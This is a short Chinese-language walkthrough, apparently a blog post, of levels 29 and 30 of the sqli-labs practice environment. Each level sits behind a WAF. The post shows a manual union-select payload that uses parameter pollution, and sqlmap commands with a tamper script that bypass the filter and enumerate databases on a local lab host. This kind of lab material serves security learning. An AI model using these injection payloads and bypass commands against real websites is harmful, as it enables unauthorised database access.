Less-29（GET - Error based - IMPIDENCE MISMATCH - Having a WAF in front of web application)

手工注入

正常注入的时候发现

此处似乎没有sql注入

但是我上一个说了这个是有waf的

http://192.168.21.149/Less-29/?id=1&id=0‘union select 1,2,3--+

这里其实已经确定有sql注入了，后面的和sqli-labs第一二关-CSDN博客一样

自动注入

waf需要脚本绕过kali的脚本在 /usr/share/sqlmap/tamper/

 sqlmap -u http://192.168.21.149/Less-29/?id=1  --tamper /usr/share/sqlmap/tamper/0eunion.py --batch

 sqlmap -u http://192.168.21.149/Less-29/?id=1  --tamper /usr/share/sqlmap/tamper/0eunion.py --dbs --batch

后面的流程就和sqli-labs第一二关-CSDN博客一样

Less-30（GET - BLIND - IMPIDENCE MISMATCH - Having a WAF in front of web application)

手工注入

错误反应

双引号闭合

和29关一样的payload

自动注入

和第29关一样但是命令有点小区别

sqlmap -u 'http://192.168.21.149/Less-30/?id=1"' --tamper /usr/share/sqlmap/tamper/0eunion.py --batch